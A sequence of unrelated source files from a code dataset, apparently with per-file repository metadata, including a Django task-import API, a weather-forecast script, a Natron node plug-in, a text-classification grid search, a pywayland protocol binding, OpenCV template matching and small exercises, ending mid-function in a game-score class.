hive_table_objlist = HiveTable.objects.filter(**hive_table_args)
for hive_table_obj in hive_table_objlist:
hive_table_obj.delete()
for i in range(0, len(table_info['column_index'])):
hive_table = {}
hive_table['database'] = table_info['database']
hive_table['table_comment'] = table_info['table_comment']
hive_table['table'] = table_info['table']
hive_table['column'] = table_info['column'][i]
hive_table['column_comment'] = table_info['columns_comment'][i]
hive_table['column_index'] = table_info['column_index'][i]
hive_table['column_type'] = table_info['column_type'][i]
if hive_table['column_type'].lower() in ['date', 'timestamp', 'datetime']:
hive_table['time_format'] = table_info['coltime_formatumn_type'][i]
else:
hive_table['time_format'] = None
hive_table_obj = HiveTable(**hive_table)
hive_table_obj.save()
# save import data task
args = {'writer': writer, 'reader': reader, 'options': options}
if ImportTask.objects.filter(**args).exists():
raise MyException(400, "task %s already exists" % writer['table'])
else:
args["start_time"] = datetime.datetime.now()
task = ImportTask(**args)
task.save()
return_data['code'] = 200
return_data['msg'] = "success"
except MultiValueDictKeyError:
return_data['code'] = 400
return_data['msg'] = 'please upload you file'
except KeyError as e:
return_data['code'] = 400
return_data['msg'] = str(e) + " is missing in " + file_obj.name
except MyException as e:
return_data['code'] = e.error_code
return_data['msg'] = e.error_message
except Exception as e:
return_data['code'] = 400
return_data['msg'] = str(e)
finally:
return Response(return_data, status=status.HTTP_200_OK)
class TaskListView(APIView):
    """Paginated listing of import tasks, newest first."""

    def get(self, request, format=None):
        """Return one page of import tasks.

        Query parameters:
            id          -- restrict to a single task id
            pageNum     -- 1-based page number (default 1)
            pageSize    -- page length (default 20)
            status      -- task status to filter on; "all" disables the filter
            search_data -- substring matched against reader/writer table names
        """
        params = self.request.GET
        page_num = int(params.get('pageNum', 1))
        page_size = int(params.get('pageSize', 20))

        filters = {}
        if 'id' in params:
            filters['id'] = params['id']
        status_param = params.get('status')
        # "all" (or an absent parameter) means no status filtering.
        if status_param is not None and status_param != "all":
            # BUG FIX: the original assigned the DRF `status` *module* here
            # (`args['status'] = status`) instead of the query-string value,
            # so the status filter could never match anything.
            filters['status'] = status_param

        task_list = ImportTask.objects.filter(**filters).order_by('-id')
        if 'search_data' in params:
            needle = params['search_data']
            task_list = task_list.filter(
                Q(reader__table__icontains=needle) |
                Q(writer__table__icontains=needle))

        total = task_list.count()
        page = task_list[(page_num - 1) * page_size:page_num * page_size]

        # Flatten the model instances into plain JSON-serializable dicts.
        pure_task_list = []
        for task in page:
            pure_task_list.append({
                'file_name': task.reader['file_name'],
                'read_table': task.reader['table'],
                'write_table': task.writer['table'],
                'status': task.status,
                'start_time': task.start_time,
                'finish_time': task.finish_time,
                'id': task.id,
            })

        return_data = {
            "msg": "success",
            "code": 200,
            "result": {"task_list": pure_task_list, "pageSize": page_size,
                       "pageNum": page_num, "total": total, }
        }
        return Response(return_data, status=status.HTTP_200_OK)
class DelTaskView(APIView):
    """Delete the import tasks whose ids are posted in `request_delete_list`."""

    def post(self, request):
        # The payload is a JSON-encoded list of primary keys.
        ids = json.loads(self.request.data['request_delete_list'])
        print(ids)
        for task_id in ids:
            get_object_or_404(ImportTask, pk=task_id).delete()
        return_data = {
            "msg": "success",
            "code": 200,
            "result": {}
        }
        return Response(return_data, status=status.HTTP_200_OK)
class ChangeStatusSubmit(APIView):
    """Mark the posted import tasks as ready to run (status "submit")."""

    def post(self, request):
        # The payload is a JSON-encoded list of primary keys.
        ids = json.loads(self.request.data['request_submit_list'])
        print(ids)
        for task_id in ids:
            task = get_object_or_404(ImportTask, pk=task_id)
            task.status = "submit"
            task.save()
        return_data = {
            "msg": "success",
            "code": 200,
            "result": {}
        }
        return Response(return_data, status=status.HTTP_200_OK)
class TaskRecord(APIView):
    """Return the per-step command execution records for one import task."""

    def post(self, request):
        import time
        print(time.time())
        filters = {}
        if 'id' in request.data.keys():
            filters['task_id'] = request.data['id']
        print(filters)

        # Flatten each CommandRecord into a plain dict for the response body.
        records = []
        for record in CommandRecord.objects.filter(**filters):
            records.append({
                'step': record.step,
                'command': record.command,
                'status': record.status,
                'start_time': record.start_time,
                'finish_time': record.finish_time,
                'log': record.log,
            })

        return_data = {
            "msg": "success",
            "code": 200,
            "result": {"task_record": records}
        }
        print(return_data)
        print(time.time())
        return Response(return_data, status=status.HTTP_200_OK)
|
[
"1335239218@qq.com"
] |
1335239218@qq.com
|
a4ecf46c6cdfa69d3a1228ab6136f7e0fda10303
|
f80eae621453835bac0749094d0ce8be50dc9c77
|
/controller/config.py
|
98d4967e0b5503901dc6db4ee3ea222015d2313a
|
[] |
no_license
|
DanielKusyDev/rpi-home-automation
|
bcb9bce951f6bdaf8c98d7cbc3f3af302a2a2b09
|
6bfff2d66c71da305bf13872c97ef51df4337417
|
refs/heads/main
| 2023-07-28T14:53:34.371903
| 2021-09-10T16:18:17
| 2021-09-10T16:18:17
| 368,314,559
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 487
|
py
|
from os import environ
from dotenv import load_dotenv
from loguru import logger
# Rotating application log: a new file is started at 500 MB.
# FIX: dropped the pointless f-string prefix (the literal has no placeholders).
logger.add("logs/info.log", format="{time} {level} {message}", level="INFO", rotation="500 MB")

# Pull variables from a local .env file into the process environment
# before the settings below are read.
load_dotenv()

# Server and database connection settings, all supplied via environment
# variables; each is None when the corresponding variable is unset.
SERVER_HOST = environ.get("SERVER_HOST")
SERVER_PORT = environ.get("SERVER_PORT")
DB_HOST = environ.get("DB_HOST")
DB_PORT = environ.get("DB_PORT")
DB_USER = environ.get("DB_USER")
DB_PASSWORD = environ.get("DB_PASSWORD")
DB_NAME = environ.get("DB_NAME")
DB_DRIVER = environ.get("DB_DRIVER")
|
[
"daniel.kusy97@gmail.com"
] |
daniel.kusy97@gmail.com
|
9079c57c1304e3afc6646edd8aec4103ff06e87e
|
24fc379db02edbb4b780f57ddf1c1a4bf50fd96e
|
/a1.py
|
926c5e6042636da938e31f9b6dac55b489d9f73f
|
[] |
no_license
|
Tanya3108/weatherforecast
|
841a229028f576c42249ec3bd51b9c8eb45fb9e7
|
e6fd92fea282029066b9f80922ee93f916135132
|
refs/heads/master
| 2020-04-28T01:37:26.391547
| 2019-03-10T18:30:23
| 2019-03-10T18:30:23
| 174,863,601
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,537
|
py
|
# Name:Tanya Sanjay Kumar, Rollno.:2018109 , Section:A , Group:5
import urllib.request
import datetime
# function to get weather response
def weather_response(location, API_key):
    """Fetch the OpenWeatherMap 5-day forecast for *location* and return the
    raw response body decoded as a UTF-8 string."""
    endpoint = ("http://api.openweathermap.org/data/2.5/forecast?q="
                + location + "&APPID=" + API_key)
    response = urllib.request.urlopen(endpoint)
    return response.read().decode('UTF8')
# function to check for valid response
def has_error(location, json):
    """Return True when *location* does not appear anywhere in the response
    text (i.e. the API did not echo the requested city back)."""
    return json.find(location) == -1
# function to get attributes on nth day1
def get_temperature (json, n, t):
# write your code
if n>=0 and n<=4:
t=str(t)
if t in ["00:00:00","03:00:00","06:00:00","09:00:00","12:00:00","15:00:00","18:00:00","21:00:00"]:
n1=datetime.date.today().day+n
if len(str(n1))==1:
n1="0"+str(n1)
n2=datetime.date.today().strftime('%Y-%m-' + str(n1))
a=int(json.find(n2+" "+t))
part=json[a-355:a+21]
temp1=part.find("temp")
temp2=part.find("temp_min")
temp=part[temp1+6:temp2-2]
return temp
else:
print("Incorrect time format. Pls enter correctly . Ex:03:00:00,06:00:00")
else:
print("Enter a number between 0 to 4 only")
def get_humidity(json, n, t):
# write your code
if n>=0 and n<=4:
t=str(t)
if t in ["00:00:00","03:00:00","06:00:00","09:00:00","12:00:00","15:00:00","18:00:00","21:00:00"]:
n1=datetime.date.today().day+n
if len(str(n1))==1:
n1="0"+str(n1)
n2=datetime.date.today().strftime('%Y-%m-' + str(n1))
a=int(json.find(n2+" "+t))
part=json[a-355:a+21]
hum1=part.find("humidity")
hum2=part.find("temp_kf")
hum=part[hum1+10:hum2-2]
return hum
else:
print("Incorrect time format. Pls enter correctly . Ex:03:00:00,06:00:00")
else:
print("Enter a number between 0 to 4 only")
def get_pressure(json, n, t):
# write your code
if n>=0 and n<=4:
t=str(t)
if t in ["00:00:00","03:00:00","06:00:00","09:00:00","12:00:00","15:00:00","18:00:00","21:00:00"]:
n1=datetime.date.today().day+n
if len(str(n1))==1:
n1="0"+str(n1)
n2=datetime.date.today().strftime('%Y-%m-' + str(n1))
a=int(json.find(n2+" "+t))
part=json[a-355:a+21]
pres1=part.find("pressure")
pres2=part.find("sea_level")
pres=part[pres1+10:pres2-2]
return pres
else:
print("Incorrect time format. Pls enter correctly . Ex:03:00:00,06:00:00")
else:
print("Enter a number between 0 to 4 only")
def get_wind(json, n, t):
# write your code
if n>=0 and n<=4:
t=str(t)
if t in ["00:00:00","03:00:00","06:00:00","09:00:00","12:00:00","15:00:00","18:00:00","21:00:00"]:
n1=datetime.date.today().day+n
if len(str(n1))==1:
n1="0"+str(n1)
n2=datetime.date.today().strftime('%Y-%m-' + str(n1))
a=int(json.find(n2+" "+t))
part=json[a-355:a+21]
wind1=part.find("speed")
wind2=part.find("deg")
wind=part[wind1+7:wind2-2]
return wind
else:
print("Incorrect time format. Pls enter correctly . Ex:03:00:00,06:00:00")
else:
print("Enter a number between 0 to 4 only")
def get_sealevel(json, n, t):
# write your code
if n>=0 and n<=4:
t=str(t)
if t in ["00:00:00","03:00:00","06:00:00","09:00:00","12:00:00","15:00:00","18:00:00","21:00:00"]:
n1=datetime.date.today().day+n
if len(str(n1))==1:
n1="0"+str(n1)
n2=datetime.date.today().strftime('%Y-%m-' + str(n1))
a=int(json.find(n2+" "+t))
part=json[a-355:a+21]
sea1=part.find("sea_level")
sea2=part.find("grnd_level")
sea=part[sea1+11:sea2-2]
return sea
else:
print("Incorrect time format. Pls enter correctly . Ex:03:00:00,06:00:00")
else:
print("Enter a number between 0 to 4 only")
|
[
"noreply@github.com"
] |
Tanya3108.noreply@github.com
|
c0f96caa76568040c2beeb3772902b5a5872d669
|
6c066611b11a8de5e2c22c30cfcc578a4c49edce
|
/BL/Color/bl_Bytes/bl_Bytes.py
|
452be86089e5169c6b247f97ed30a110a1e8973e
|
[] |
no_license
|
NatronGitHub/natron-plugins
|
ad2d9227637b4b86b45f92856fa54d327872a0a6
|
b0c499fb6391024f54be9f26ed41b5cf7475d574
|
refs/heads/master
| 2022-12-12T10:02:20.252222
| 2022-11-30T02:29:04
| 2022-11-30T02:29:04
| 130,576,224
| 332
| 67
| null | 2022-11-30T02:29:05
| 2018-04-22T14:39:29
|
Python
|
UTF-8
|
Python
| false
| false
| 15,013
|
py
|
# -*- coding: utf-8 -*-
# DO NOT EDIT THIS FILE
# This file was automatically generated by Natron PyPlug exporter version 10.
# Hand-written code should be added in a separate file named bl_BytesExt.py
# See http://natron.readthedocs.org/en/master/devel/groups.html#adding-hand-written-code-callbacks-etc
# Note that Viewers are never exported
import NatronEngine
import sys
# Try to import the extensions file where callbacks and hand-written code should be located.
try:
from bl_BytesExt import *
except ImportError:
pass
def getPluginID():
    # Unique identifier under which Natron registers this PyPlug.
    return "natron.community.plugins.bl_Bytes"

def getLabel():
    # Node label shown in Natron's user interface.
    return "bl_Bytes"

def getVersion():
    # PyPlug version number.
    return 1

def getIconPath():
    # Icon file for the node, relative to the plug-in directory.
    return "bl_Bytes.png"

def getGrouping():
    # Menu path under which the node appears in Natron.
    return "Community/BL/Color"

def getPluginDescription():
    # Tooltip / description text shown for the node.
    return "Node is similar to the Shake\'s one. It convert the picture in another byte space. This is of course a simple simulation as Nuke know to work only in 32 floating point color space. "
def createInstance(app, group):
    """Build the bl_Bytes PyPlug: user parameters on the group node, then the
    internal graph Source -> Multiply1 -> SeExprSimple -> Multiply2 -> Output.

    The API call sequence is identical to the exporter's output; the
    repetitive parameter boilerplate is driven by two small helpers.
    """
    node = group
    node.setColor(0.3333, 0.702, 0.3529)

    def add_label(page, name):
        # Invisible string "label" params used as vertical spacers.
        param = node.createStringParam(name, "")
        param.setType(NatronEngine.StringParam.TypeEnum.eStringTypeLabel)
        page.addParam(param)
        param.setHelp("")
        param.setAddNewLine(True)
        param.setEvaluateOnChange(False)
        param.setAnimationEnabled(False)
        setattr(node, name, param)

    def add_separator(page, name, label):
        # Horizontal separator carrying a caption.
        param = node.createSeparatorParam(name, label)
        page.addParam(param)
        param.setHelp("")
        param.setAddNewLine(True)
        param.setPersistent(False)
        param.setEvaluateOnChange(False)
        setattr(node, name, param)

    # ---- "Controls" page -------------------------------------------------
    node.Controls = node.createPageParam("Controls", "Controls")
    add_label(node.Controls, "sep01")
    add_label(node.Controls, "sep02")
    add_separator(node.Controls, "SETUP", "Setup")
    add_label(node.Controls, "sep03")
    add_label(node.Controls, "sep04")

    # The single functional control: bit depth to quantize to.
    param = node.createIntParam("bytes", "Bits per channel : ")
    param.setMinimum(1, 0)
    param.setMaximum(32, 0)
    param.setDisplayMinimum(1, 0)
    param.setDisplayMaximum(32, 0)
    param.setDefaultValue(2, 0)
    param.restoreDefaultValue(0)
    node.Controls.addParam(param)
    param.setHelp("")
    param.setAddNewLine(True)
    param.setAnimationEnabled(True)
    node.bytes = param
    del param

    add_label(node.Controls, "sep05")
    add_label(node.Controls, "sep06")

    # ---- "Credits" page --------------------------------------------------
    node.Credits = node.createPageParam("Credits", "Credits")
    add_label(node.Credits, "sep101")
    add_label(node.Credits, "sep102")
    add_separator(node.Credits, "NAME", "bl_Bytes v1.0")
    add_label(node.Credits, "sep103")
    add_label(node.Credits, "sep104")
    add_separator(node.Credits, "LINE01", "")
    add_label(node.Credits, "sep105")
    add_label(node.Credits, "sep106")
    add_separator(node.Credits, "FR", "Version NATRON du Gizmo Nuke développé par Bertrand Lempereur")
    add_label(node.Credits, "sep107")
    add_label(node.Credits, "sep108")
    add_separator(node.Credits, "ENG", "NATRON version of Nuke Gizmo developed by Bertrand Lempereur")
    add_label(node.Credits, "sep109")
    add_label(node.Credits, "sep110")
    add_separator(node.Credits, "CONVERSION", " (Fabrice Fernandez - 2018)")
    add_label(node.Credits, "sep111")
    add_label(node.Credits, "sep112")

    # Refresh the GUI with the newly created parameters.
    node.setPagesOrder(['Controls', 'Credits', 'Node', 'Settings'])
    node.refreshUserParamsGUI()
    del node

    # ---- Internal node graph ---------------------------------------------
    output_node = app.createNode("fr.inria.built-in.Output", 1, group)
    output_node.setLabel("Output2")
    output_node.setPosition(4139, 4252)
    output_node.setSize(80, 32)
    output_node.setColor(0.7, 0.7, 0.7)

    source_node = app.createNode("fr.inria.built-in.Input", 1, group)
    source_node.setScriptName("Source")
    source_node.setLabel("Source")
    source_node.setPosition(4139, 3536)
    source_node.setSize(80, 32)
    source_node.setColor(0.3, 0.5, 0.2)

    multiply1 = app.createNode("net.sf.openfx.MultiplyPlugin", 2, group)
    multiply1.setScriptName("Multiply1")
    multiply1.setLabel("Multiply1")
    multiply1.setPosition(4139, 3815)
    multiply1.setSize(80, 32)
    multiply1.setColor(0.48, 0.66, 1)
    param = multiply1.getParam("value")
    if param is not None:
        for dim in range(4):
            param.setValue(4, dim)
    del param

    seexpr = app.createNode("fr.inria.openfx.SeExprSimple", 2, group)
    seexpr.setScriptName("SeExprSimple1_2")
    seexpr.setLabel("SeExprSimple1_2")
    seexpr.setPosition(4139, 3892)
    seexpr.setSize(80, 55)
    seexpr.setColor(0.3, 0.5, 0.2)
    # Quantize each channel by flooring it (after the scale-up above).
    for name, expr in (("rExpr", "floor(r)"), ("gExpr", "floor(g)"), ("bExpr", "floor(b)")):
        param = seexpr.getParam(name)
        if param is not None:
            param.setValue(expr)
        del param

    multiply2 = app.createNode("net.sf.openfx.MultiplyPlugin", 2, group)
    multiply2.setScriptName("Multiply2")
    multiply2.setLabel("Multiply2")
    multiply2.setPosition(4139, 3971)
    multiply2.setSize(80, 32)
    multiply2.setColor(0.48, 0.66, 1)
    param = multiply2.getParam("value")
    if param is not None:
        for dim in range(4):
            param.setValue(0.25, dim)
    del param
    param = multiply2.getParam("premult")
    if param is not None:
        param.setValue(True)
    del param

    # Now that all nodes are created we can connect them together.
    output_node.connectInput(0, multiply2)
    multiply1.connectInput(0, source_node)
    seexpr.connectInput(0, multiply1)
    multiply2.connectInput(0, seexpr)

    # Drive both multipliers from the "bytes" user parameter so the
    # quantization step size follows the requested bit depth.
    param = multiply1.getParam("value")
    for dim in range(4):
        param.setExpression("pow(thisGroup.bytes.get(),2)", False, dim)
    del param
    param = multiply2.getParam("value")
    for dim in range(4):
        param.setExpression("1/pow(thisGroup.bytes.get(),2)", False, dim)
    del param

    # Give hand-written extension code (bl_BytesExt) a chance to run.
    try:
        extModule = sys.modules["bl_BytesExt"]
    except KeyError:
        extModule = None
    if extModule is not None and hasattr(extModule, "createInstanceExt") and hasattr(extModule.createInstanceExt, "__call__"):
        extModule.createInstanceExt(app, group)
|
[
"fabiof17pro@gmail.com"
] |
fabiof17pro@gmail.com
|
68973393fd246e8fd53093609d62eeb7f9232521
|
e4719910564b923cae492cf5f1ccd8590a6cda05
|
/app/08_gridsearch_bow_tfidf.py
|
717e7e60818dd7c4f0d8b5360dfd95fac2388a3a
|
[] |
no_license
|
ninnin-engineer/natural-language-classifier
|
4f4b8865fa8a0cb453ae96ba7db76a0565795979
|
2ca0d8799b7a0ec60e86c83017eb696cf5874625
|
refs/heads/master
| 2021-08-16T17:33:24.208039
| 2017-11-20T05:59:15
| 2017-11-20T05:59:15
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,495
|
py
|
from sklearn.linear_model import LogisticRegression
from sklearn.model_selection import train_test_split, GridSearchCV
from sklearn.feature_extraction.text import CountVectorizer, TfidfVectorizer
from sklearn.pipeline import Pipeline
from preprocessings.tokenizer import MeCabTokenizer
from preprocessings.livedoor import load_df
# Compared with script 01, the tokenizer was switched from janome to MeCab.
# Pipeline: tokenize with MeCab, vectorize sentences (BOW / TF-IDF),
# classify with LogisticRegression.
# Single shared MeCab tokenizer instance used by the helpers below.
mecab = MeCabTokenizer()
def tokenize(word):
    """Tokenize *word* with MeCab and return the surfaces joined by spaces."""
    surfaces = (mecab.surface(token) for token in mecab.tokenize(word))
    return " ".join(surfaces)
def tokenize_by_pos(word):
    """Like tokenize(), but keep only verbs, adjectives, adjectival nouns
    and nouns (the POS names below are the MeCab Japanese labels)."""
    kept = [mecab.surface(token)
            for token in mecab.tokenize(word)
            if mecab.exist_pos(token, ('動詞', '形容詞', '形容動詞', '名詞'))]
    return " ".join(kept)
# Load the livedoor articles with their labels as a DataFrame.
df = load_df()
# Split train : test = 9 : 1.
X_train, X_test, Y_train, Y_test = train_test_split(df['docs'], df['labels'], test_size=0.1,random_state=3)
grid_list = [
    # Evaluate CountVectorizer + LogisticRegression.
    # CountVectorizer: tokenizer
    # LogisticRegression: penalty, C
    {
        'param_grid': {
            'vect__ngram_range': [(1, 1)],
            'vect__tokenizer': [tokenize, tokenize_by_pos],
            'clf__penalty': ['l1', 'l2'],
            'clf__C': [1.0, 10.0, 50.0, 100.0]
        },
        'pipeline': Pipeline([
            ('vect', CountVectorizer()),
            ('clf', LogisticRegression())
        ])
    },
    # Evaluate TfidfVectorizer + LogisticRegression.
    # TfidfVectorizer: tokenizer, use_idf
    # LogisticRegression: penalty, C
    {
        'param_grid': {
            'vect__ngram_range': [(1, 1)],
            'vect__tokenizer': [tokenize, tokenize_by_pos],
            'vect__use_idf': [True, False],
            'clf__penalty': ['l1', 'l2'],
            'clf__C': [1.0, 10.0, 50.0, 100.0]
        },
        'pipeline': Pipeline([
            ('vect', TfidfVectorizer()),
            ('clf', LogisticRegression())
        ])
    },
]
# 10-fold cross-validated grid search over each pipeline; print the best
# parameters on the training folds and the accuracy on the held-out split.
for grid in grid_list:
    gs = GridSearchCV(grid["pipeline"], grid["param_grid"], n_jobs = -1, cv = 10, scoring = 'accuracy', verbose = 1)
    gs.fit(X_train, Y_train)
    print('Best parameter set: %s' % gs.best_params_)
    print('CV Accuracy: %.3f' % gs.best_score_)
    clf = gs.best_estimator_
    print('Test CV Accuracy: %.3f' % clf.score(X_test, Y_test))
|
[
"afujiwara2012@gmail.com"
] |
afujiwara2012@gmail.com
|
0fc1254b81c377e99f1de74727562858351c0a9d
|
172e4a0a42af7b6031e0755863765882844c12c9
|
/test/scanner_files/wl_destructor.py
|
869d151c5e4337b801d96cb6a5202b5d5d2153bd
|
[
"Apache-2.0"
] |
permissive
|
green-green-avk/pywayland
|
7020da05d46596a62185ad69e59c0e22633d4681
|
65aae61d5df320dc0c39d46761e44a4e34137bb2
|
refs/heads/main
| 2023-02-27T22:50:10.883373
| 2020-12-27T21:40:45
| 2020-12-27T21:40:45
| 337,197,445
| 1
| 0
|
Apache-2.0
| 2021-02-08T20:14:20
| 2021-02-08T20:14:19
| null |
UTF-8
|
Python
| false
| false
| 2,433
|
py
|
# This file has been autogenerated by the pywayland scanner
# Copyright 2015 Sean Vig
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from pywayland.protocol_core import Argument, ArgumentType, Global, Interface, Proxy, Resource
class WlDestructor(Interface):
    """Destructor object

    An interface object with a destructor request.

    And a multiline description.
    """

    # Wayland interface name and version advertised to the registry.
    name = "wl_destructor"
    version = 1
class WlDestructorProxy(Proxy):
    # Client-side proxy for the wl_destructor interface.
    interface = WlDestructor

    @WlDestructor.request(
        Argument(ArgumentType.NewId, interface=WlDestructor),
        Argument(ArgumentType.Int),
        Argument(ArgumentType.Int),
        Argument(ArgumentType.Int),
        Argument(ArgumentType.Int),
        Argument(ArgumentType.Uint),
    )
    def create_interface(self, x, y, width, height, format):
        """Create another interface

        Create a :class:`WlDestructor` interface object

        :param x:
        :type x:
            `ArgumentType.Int`
        :param y:
        :type y:
            `ArgumentType.Int`
        :param width:
        :type width:
            `ArgumentType.Int`
        :param height:
        :type height:
            `ArgumentType.Int`
        :param format:
        :type format:
            `ArgumentType.Uint`
        :returns:
            :class:`WlDestructor`
        """
        # Opcode 0: constructor request — marshals the call and returns the
        # newly created proxy object.
        id = self._marshal_constructor(0, WlDestructor, x, y, width, height, format)
        return id

    @WlDestructor.request()
    def destroy(self):
        """Destroy the interface

        Destroy the created interface.
        """
        # Opcode 1: destructor request; also invalidates this proxy locally.
        self._marshal(1)
        self._destroy()
class WlDestructorResource(Resource):
    # Server-side counterpart of the interface.
    interface = WlDestructor


class WlDestructorGlobal(Global):
    # Global object used to advertise the interface via the registry.
    interface = WlDestructor


# Generate the C FFI structures and wire the proxy/resource/global classes
# onto the interface so pywayland can instantiate them.
WlDestructor._gen_c()
WlDestructor.proxy_class = WlDestructorProxy
WlDestructor.resource_class = WlDestructorResource
WlDestructor.global_class = WlDestructorGlobal
|
[
"sean.v.775@gmail.com"
] |
sean.v.775@gmail.com
|
2e1cb36c02ee08cfff40f3600c9b018391805cdc
|
cde520412b2df7d0594a25dfb111c5d0726936b5
|
/custTemplateMatching.py
|
97b59a4a36ed117baf1fa0fd4ddc7e5a66f49aac
|
[] |
no_license
|
SimonaMnv/Template-matching
|
782dcd5d61e24a8e7bd40c23ba54cd26e1de1937
|
a4bb1608c447e7ad8debb044aa2b6f598483f37b
|
refs/heads/master
| 2022-11-17T07:02:32.621325
| 2020-07-14T16:25:36
| 2020-07-14T16:25:36
| 279,632,942
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,117
|
py
|
import cv2
import numpy as np
import skimage
import sklearn
from skimage.color import label2rgb
from skimage.util import random_noise
from sklearn.cluster import estimate_bandwidth, MeanShift, MiniBatchKMeans
from matplotlib import pyplot as plt
from sklearn.metrics import jaccard_score
import os
import pandas as pd
#########################################
# SimonaMnv #
#########################################
def img_print(blabla, img):
    """Show *img* in a resizable 450x450 window titled *blabla* and block
    until a key is pressed."""
    cv2.namedWindow(blabla, cv2.WINDOW_NORMAL)
    cv2.imshow(blabla, img)
    cv2.resizeWindow(blabla, 450, 450)
    cv2.waitKey(0)
def color_hist_similarity(img_patch, target):
    """Similarity between *img_patch* and *target* based on their channel-0
    256-bin histograms, using OpenCV comparison method 0 (correlation)."""
    hist_args = ([0], None, [256], [0, 256])
    target_hist = cv2.calcHist([target], *hist_args)
    patch_hist = cv2.calcHist([img_patch], *hist_args)
    return cv2.compareHist(target_hist, patch_hist, 0)
def template_matching(img, target, thres):
    """Slide *target* over *img* and collect (x, y) top-left corners of
    patches whose color-histogram similarity exceeds *thres*.

    Returns (loc, maxScores): matched corners as (x, y) tuples and their
    similarity scores.  NOTE(review): matched regions are overwritten in
    *img* with a block of ones to suppress repeated detections of the same
    object — this mutates the caller's image, and presumably assumes a
    float image where 1.0 is "white"; confirm against the caller.
    """
    height, width = img.shape[:2]
    tar_height, tar_width = target.shape[:2]
    # One similarity score per possible top-left placement of the template.
    NccValue = np.zeros((height - tar_height, width - tar_width))
    loc = []
    mask = np.ones((tar_height, tar_width, 3))
    maxScores = []
    # Create a sliding template-window
    for m in range(0, height - tar_height):
        for n in range(0, width - tar_width):
            img_patch = img[m: m + tar_height, n: n + tar_width]  # scan through the moving window
            # img_print("Sliding Window", skimage.util.img_as_ubyte(img))  # check if the window moves
            NccValue[m, n] = color_hist_similarity(img_patch, target)  # calculate histogram of each image patch
            if NccValue[m, n] > thres:  # check if that patch is above the threshold
                maxScores.append(NccValue[m, n])
                offset = np.array((m, n))  # use the mask to spread out the box detection
                img[offset[0]:offset[0] + mask.shape[0], offset[1]:offset[1] + mask.shape[1]] = mask
                (max_Y, max_X) = (m, n)
                loc.append((max_X, max_Y))  # appends backwards!
    return loc, maxScores
def question2():
    """Run histogram-based template matching on image 9 and draw the hits."""
    # `image` gets the detection mask painted into it by template_matching,
    # so a second untouched copy (`image2`) is loaded for drawing results.
    image = cv2.imread('images to use/9.JPG', cv2.IMREAD_COLOR)
    image2 = cv2.imread('images to use/9.jpg',
                        cv2.IMREAD_COLOR)  # the original has the mask above, so print a clear one
    target = cv2.imread('images to use/9-template.jpg', cv2.IMREAD_COLOR)
    height, width = target.shape[:2]
    top_left, scores = template_matching(image, target, 0.80)  # Set the threshold here!!!
    # Draw one red box and its rounded score per detection.
    for i in range(0, len(top_left)):  # Print all the boxes found in the threshold range
        loc = top_left[i]
        cv2.rectangle(image2, loc, (loc[0] + width, loc[1] + height), (0, 0, 255), 3)
        cv2.putText(image2, str(round(scores[i], 4)), (loc[0] + width - 100, loc[1] + height), cv2.FONT_HERSHEY_SIMPLEX,
                    0.6, (255, 255, 255), 2)
    img_print("Object(s) detected", image2)
if __name__ == "__main__":
    # BUG FIX: the script previously called question1(), which is not defined
    # anywhere in this file and raised a NameError; the entry point defined
    # above is question2().  Also guarded so importing the module is safe.
    question2()
|
[
"noreply@github.com"
] |
SimonaMnv.noreply@github.com
|
bcb6789e91dca3a31da6ce95c94dfe06d763ddc8
|
219d7cf7cf00b778ff1a5709406c144fcf2132f3
|
/Conditional Statements Advanced - Exercise/02. Summer Outfit.py
|
3e7683abaeeaf4841c1a9928e49fd63839b68e7d
|
[] |
no_license
|
SilviaKoynova/Softuni-Programming-Basics-Python
|
e8e175419383815c65c4e110fdb2b752d940e887
|
0dfef0850f2cb8471dfee1af89f137be4e887cb8
|
refs/heads/main
| 2023-07-13T00:35:09.389302
| 2021-08-27T07:43:45
| 2021-08-27T07:43:45
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,598
|
py
|
# Read the temperature and the part of the day, then print what to wear.
degrees = int(input())
time_of_day = input()

# (outfit, shoes) per part of the day, indexed by temperature band:
# band 0: 10-18 degrees, band 1: 19-24 degrees, band 2: 25 degrees and up.
wardrobe = {
    "Morning": [("Sweatshirt", "Sneakers"), ("Shirt", "Moccasins"), ("T-Shirt", "Sandals")],
    "Afternoon": [("Shirt", "Moccasins"), ("T-Shirt", "Sandals"), ("Swim Suit", "Barefoot")],
    "Evening": [("Shirt", "Moccasins"), ("Shirt", "Moccasins"), ("Shirt", "Moccasins")],
}

outfit = ""
shoes = ""
# Below 10 degrees or for an unknown part of day nothing is printed,
# matching the original branch structure.
if time_of_day in wardrobe and degrees >= 10:
    if degrees <= 18:
        band = 0
    elif degrees <= 24:
        band = 1
    else:
        band = 2
    outfit, shoes = wardrobe[time_of_day][band]
    print(f"It's {degrees} degrees, get your {outfit} and {shoes}.")
|
[
"noreply@github.com"
] |
SilviaKoynova.noreply@github.com
|
8fc5f3865f7a9e682236cc391b65ebcc74bec881
|
3a35b842a2f6ee3c1f5fcad1674b6a0adc587f8e
|
/games/simple_game.py
|
20829fca1412e8449ef739c48c8eac06708cc00d
|
[] |
no_license
|
nyquist/scorobot
|
fef3039a8cf9bc92bb216b2e29c2b5ebd2d31728
|
63b535da3bf0e1ef6ca9a216870061239748fddf
|
refs/heads/master
| 2021-08-10T13:56:42.540909
| 2020-06-01T15:12:27
| 2020-06-01T15:12:27
| 186,715,717
| 0
| 0
| null | 2020-05-16T21:57:14
| 2019-05-14T23:35:56
|
Python
|
UTF-8
|
Python
| false
| false
| 1,828
|
py
|
class Game:
def __init__(self, player1, player2):
self._players = (player1, player2)
self._scores = []
def get_players(self):
return self._players
def add_score(self, score1, score2):
self._scores.append((score1, score2))
def get_scores(self, last = False):
# when last = 0, return all
if not last:
return self._scores
else:
return self._scores[-last:]
@staticmethod
def _compute_stats(scores):
# W,D,L,GS,GC
player1 = [0,0,0,0,0]
player2 = [0,0,0,0,0]
for score in scores:
if score[0] > score[1]:
player1[0] = player1[0] + 1
